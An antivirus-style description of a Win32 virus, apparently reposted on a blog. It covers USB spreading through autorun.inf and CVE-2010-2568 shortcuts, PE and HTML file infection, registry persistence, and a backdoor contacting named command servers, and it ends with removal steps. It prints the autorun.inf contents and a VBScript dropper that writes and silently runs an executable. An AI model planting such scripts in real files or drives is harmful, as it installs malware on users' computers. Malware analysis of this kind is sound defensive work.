Platform: Win32
Type: Virus
Size: 103936 bytes
Language: C++
md5: CDF0778E1B80069D137A3E7A0C7C787F
sha1: E1826123B190C1FB3D11BBEA33EF6D1CCEABAD43
Summary
It is a malicious program which infects files on a User's PC.
Technical Details
Spreading over Removable Storage Devices
On all removable storage devices connected to the infected computer, the virus creates the following files:
<infected volume name>:\Recycler\S-<ID>\<rnd_1>.cpl (3584 bytes)
<infected volume name>:\Recycler\S-<ID>\<rnd_2>.exe (56832 bytes)
<infected volume name>:\Copy of Shortcut to (1).lnk (691 bytes)
<infected volume name>:\Copy of Shortcut to (2).lnk (722 bytes)
<infected volume name>:\Copy of Shortcut to (3).lnk (858 bytes)
<infected volume name>:\Copy of Shortcut to (4).lnk (867 bytes)
<infected volume name>:\autorun.inf (11964 bytes)
where
- <ID> — is a digit identifier (e.g.: "1-4-83-4678327503-5842818778-105234524-7024"),
- <rnd_1>, <rnd_2> — random Latin alphabet sequences (e.g.: "xVgGwSIp", "lwTCZgQP").
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-<ID>\<rnd_2>.exe
shell\explore\command=\RECYCLER\S-<ID>\<rnd_2>.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-<ID>\<rnd_2>.exe
The script is executed each time the user opens the infected disk
using the Windows Explorer if the autoplay function is turned on. Being
executed, the script launches the "<rnd_2>.exe" file.
Shortcuts created by the malicious program are exploits which use the CVE-2010-2568
vulnerability. In the "shell32.dll" library, this vulnerability
consists in error of the shortcut processing (lnk and .pif files) and
allows launching a code of random Windows libraries when hitting icons
to open programs by the Windows Explorer. The code of the "<rnd_1>.cpl" library is launched. Being executed, it launches the "<rnd_2>.exe" file.
The malicious program prevents modifying the files described above and creates them in an endless cycle. File Infection
The virus infects files with the following extensions:
exe
html
dll
htm
Executive files and Windows dynamic link libraries are infected
by adding the virus body in the end of the last
PE-section of the target file. With that, an entry point to the program
changes in such a way as to allow the virus code to manage it.
While infecting the HTML, HTM files, the following script is added in
the end of the target document:
<SCRIPT
Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A... (binary virus body)"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If
FSO.FileExists(DropPath)=False
Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
Thus, upon each launch, the virus body is saved to the current user's temporary folder as
%Temp%\svchost.exe
and launched for execution.
Payload
Once the infected file is launched, the Trojan decrypts and extracts the following file from its body:
%WorkDir%\<name of the infected file being launched>Srv.exe
Then, the created file is launched for execution. With that, a copy of the file is created and launched:
%Program Files%\Microsoft\WaterMark.exe
Then, the "WaterMark.exe" process launches an example of the
"svchost.exe" system process and injects its code into this process
which performs the following actions:
- Creates a unique identifier with the following name to control the uniqueness of its process in the system:
Global\SYSTEM_DEMETRA_MAIN - Modifies a registry key value to automatically run a malicious software copy created earlier:
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]"Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"With that, the copy is launched by the "winlogon.exe" process even if a computer starts in a safe mode. - Prevents modifying autorun registry key as well as the "WaterMark.exe" file.
- Creates a configuration file to store the current settings of the malicious software:
%System%\dmlconf.dat - Visit the following resource to check for a connection to the Internet:
google.com - Realizes the backdoor. To get a list of commands, it connects to the servers:
tybdtyutjfyvetscev.comervwetyrbuyouiylkdhrbt.comtybsyiutnrtvtybdrser.comDepending on the command(s) get from the intruder, the backdoor can perform the following actions:
- upload files to the infected computer and launch them for execution.- connect to another server to get commands. - The code injected into the address space of the "svchost.exe" process executes a functionality described in the Spreading over Removable Storage Devices and File Infection sections.
Removal Recommendations
To delete a malicious program, proceed through the steps listed below:- Run a full scan of your computer using the Antivirus program with the updated definition database.
- Do not launch the EXE, HTM, HTML files and do not reboot your computer until a full scan is complete.
- Restore the infected files from the backup copies.
- Restore the registry key value (How to Work with System Registry):
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]"Userinit" = "userinit.exe" - Delete the following files:
<infected volume name>:\Recycler\S-<ID>\<rnd_1>.cpl (3584 bytes)<infected volume name>:\Recycler\S-<ID>\<rnd_2>.exe (56832 bytes)<infected volume name>:\Copy of Shortcut to (1).lnk (691 bytes)<infected volume name>:\Copy of Shortcut to (2).lnk (722 bytes)<infected volume name>:\Copy of Shortcut to (3).lnk (858 bytes)<infected volume name>:\Copy of Shortcut to (4).lnk (867 bytes)<infected volume name>:\autorun.inf (11964 bytes)%Temp%\svchost.exe%WorkDir%\<name of infected file being launched >Srv.exe%Program Files%\Microsoft\WaterMark.exe - Delete the original Trojan file (its file name and location depends on the way the Trojan originally penetrated a user’s computer).
- Delete an original Trojan file (its location on the infected PC depends on the way the program has been installed on the PC).
- Clean the Temporary Internet Files folder which contains infected files.
0 comments:
Post a Comment
အနည္းဆံုးေတာ့ တစ္ခုခု ေရးခဲ့ပါ ေဒါင္းလို့မရရင္လဲေျပာခဲ့ ေပးပါ